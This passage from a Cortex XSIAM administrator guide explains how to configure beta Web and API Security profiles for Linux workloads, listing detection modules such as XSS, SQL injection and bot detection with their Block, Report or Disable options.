Set up Web and API Security profiles - Web and API Security profiles provide comprehensive real-time detection and protection for web-based applications and APIs running on Linux-based workloads. - Administrator Guide - Cortex XSIAM - Cortex

Set up Web and API Security profiles - Web and API Security profiles provide comprehensive real-time detection and protection for web-based applications and APIs running on Linux-based workloads. - Administrator Guide - Cortex XSIAM - Cortex - Security Operations

Cortex XSIAM 3.x Documentation

Product

Cortex XSIAM

Creation date

2025-07-15

Last date published

2026-06-16

Note

Web and API Security profiles and policies are currently a Beta feature.

You can configure Web and API Security profiles to provide comprehensive real-time detection and protection for web-based applications and APIs running on Linux-based workloads. These profiles can be applied to policies for such workloads.

For each setting that you want to override, clear the corresponding option to Use Default, and then select the setting of your choice.

Note

In this profile, the Report options configure the workload to report the corresponding malicious applications or APIs to Cortex XSIAM, without blocking them. The Disabled options configure the workloads to neither analyze nor report the corresponding malware or behavior.

Add a new profile and define basic settings.
1. From Cortex XSIAM, select Inventory → Endpoints → Policy Management → Prevention → Profiles. Click +Add Profile, and select whether to create a new profile, or to import a profile from a file.
2. Select the Linux platform, and Web & API Security as the profile type.
3. Click Next.
4. Enter a unique Profile Name for the profile. The name can contain only letters, numbers, or spaces, and must be no more than 30 characters. The name will be visible from the list of profiles when you configure a policy rule.
5. (Optional) Enter a description that describes the intention or business purpose of the profile.

Configure Action Mode options. If you choose Enable, you can then configure each item separately.

Item	Options	More details
Action Mode	Enable Disable	When set to Enable, Cortex XSIAM performs the configured action for each of the options.
XSS	Block Report Disable	When Cortex XSIAM detects cross-site scripting (XSS) injection, it performs the configured action. XSS attacks are attacks in which malicious JavaScript snippets are injected into otherwise benign and trusted websites. In such attacks, attackers try to trick the browser into switching to a JavaScript context and executing arbitrary code.
SQL Injection	Block Report Disable	When Cortex XSIAM detects SQL injection (SQLi) attempts, it performs the configured action. (SQLi) attacks can occur when an attacker successfully inserts a malicious SQL query into the input fields of a web application. A successful attack can read sensitive data from the database, modify data in the database, or run arbitrary commands.
Injection Attacks	Block Report Disable	When Cortex XSIAM detects injection attacks, it performs the configured action. Injection attacks are a form of attacks in which attackers attempt to insert malicious input into an application to manipulate its execution. Command and code payloads can either be injected as part of HTTP requests, or are included from local or remote files (also known as File Inclusion attacks).
CVE Exploits	Block Report Disable	When Cortex XSIAM detects known vulnerabilities (Common Vulnerabilities and Exposures (CVEs)), it performs the configured action.
Sensitive Data Exposure	Block Report Disable	When Cortex XSIAM protects workloads from exposing sensitive data, it performs the configured action. This module protects workloads from providing responses that could expose sensitive data found in critical system files, including password hashes (/etc/shadow), user account information (/etc/passwd), and private encryption keys.
Authentication Bypass	Block Report Disable	When Cortex XSIAM detects attempts to bypass authentication controls, it performs the configured action. This module protects against attacks that attempt to circumvent authentication controls through session manipulation, token exploitation, or credential abuse.
Advanced Threat Protection	Block Report Disable	When Cortex XSIAM detects evolving threats, it performs the configured action. Advanced Threat Protection (ATP) is a comprehensive security feature designed to detect, prevent, and respond to sophisticated web and API threats, ensuring robust protection for workloads against evolving risks.
Offensive Tools	Block Report Disable	Cortex XSIAM can identify offensive tools that scan web applications for known security vulnerabilities and misconfiguration, and exploit them. When such tools are found, this module can block or report them.
Malformed Traffic	Block Report Disable	When Cortex XSIAM detects HTTP requests with anomalies that are not expected from common web browsers, it performs the configured action.
Automation Tools	Block Report Disable	When Cortex XSIAM detects automated tools, it performs the configured action. Malicious automated tools or services can scrape website contents such as Scriptable headless web browsers, command line tools, or HTTP libraries.
Known Bots	Block Report Disable	When Cortex XSIAM detects known bots, it performs the configured action. Cortex XSIAM can identify legitimate bots that properly declare their identity and purpose, such as search engine crawlers and authorized web indexers. These bots follow standard protocols and provide verifiable operator information, however some of them might cause undesirable behaviors, such as spam, and you might prefer to block such bots.

To save the profile, click Create.

What to do next

If you are ready to apply your new profile to endpoints, you do this by adding it to a policy rule. If you still need to define other profiles, you can do this later. During policy rule creation or editing, you select the endpoints to which to assign the policy. There are different ways of doing this, such as: